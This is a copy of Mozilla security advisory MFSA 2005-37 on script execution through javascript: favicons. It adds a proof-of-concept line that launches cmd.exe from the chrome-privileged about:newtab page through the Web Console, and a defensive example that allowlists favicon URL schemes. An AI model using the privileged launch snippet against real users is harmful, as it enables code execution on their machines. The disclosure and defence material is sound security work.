Code execution through javascript: favicons
- Announced: April 15, 2005
- Reporter: Michael Krax
- Impact: Critical
- Products: Firefox, Mozilla Suite
- Fixed in: Firefox 1.0.3, Mozilla Suite 1.7.7
Description
Firefox and the Mozilla Suite support custom "favicons" through the <LINK rel="icon"> tag. If a link tag is added to the page programmatically and a javascript: URL is used, then the script will run with elevated privileges and could run or install malicious software.
Workaround
Disable JavaScript.
PoC Test: Firefox latest version 51.0.1 (32-bit)
1. Open new tab (about:newtab)
2. Execute the code below using the Web Console (press Ctrl+Shift+K)
---------------------------------------------------------------
f=Components.classes['@mozilla.org/file/local;1'].createInstance(Components.interfaces.nsILocalFile);f.initWithPath('c:\\Windows\\System32\\cmd.exe');f.launch()
---------------------------------------------------------------
'about:newtab' is considered a chrome-privileged page; injecting code within such a context would result in automatic RCE.
Here is an example:
https://www.mozilla.org/en…/security/advisories/mfsa2005-37/
original source:
https://twitter.com/Qab/status/806891824354836480
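The Description above turns on a javascript: URL reaching the favicon loader through a programmatically added link tag. As an added example (not from the advisory and not Mozilla's fix), here is one way code that fetches favicons could allowlist schemes on the parsed URL rather than the raw string; the function names, the allowlist and the sample hrefs are assumptions constructed for illustration.

```javascript
// Added example: scheme allowlist for <link rel="icon"> hrefs.
// ALLOWED_ICON_SCHEMES, checkIconHref and auditIconLinks are hypothetical names.
// The allowlist is a policy choice for this sketch (data: is refused too).
const ALLOWED_ICON_SCHEMES = new Set(["http:", "https:"]);

// Resolve href against the page URL the way a browser would, then decide
// on the parsed scheme, never on a prefix match against the raw string.
function checkIconHref(href, pageUrl) {
  let resolved;
  try {
    resolved = new URL(href, pageUrl);
  } catch (err) {
    return { allowed: false, reason: "unparseable", scheme: null };
  }
  // The URL parser lower-cases the scheme and drops tabs, newlines and
  // leading/trailing whitespace, so obfuscated spellings normalise here.
  const scheme = resolved.protocol;
  if (!ALLOWED_ICON_SCHEMES.has(scheme)) {
    return { allowed: false, reason: "scheme not allowed", scheme };
  }
  return { allowed: true, reason: "ok", scheme, url: resolved.href };
}

// Constructed sample input: hrefs as a page script might set them on a
// dynamically added <link rel="icon"> element.
const SAMPLE_HREFS = [
  "/favicon.ico",
  "https://cdn.example.test/icon.png",
  "javascript:void(0)",
  "JaVaScRiPt:void(0)",
  "  java\tscript:void(0)",
  "data:image/png;base64,AAAA",
];

// Return one verdict per href so a caller can log or block each link.
function auditIconLinks(hrefs, pageUrl) {
  return hrefs.map((href) => ({ href, ...checkIconHref(href, pageUrl) }));
}

for (const r of auditIconLinks(SAMPLE_HREFS, "https://example.test/page")) {
  console.log(r.allowed ? "ALLOW" : "BLOCK", JSON.stringify(r.href), r.scheme);
}
```

A check like `href.startsWith("javascript:")` on the raw string would miss the mixed-case and tab-split entries in the sample, which is why the decision is made after parsing.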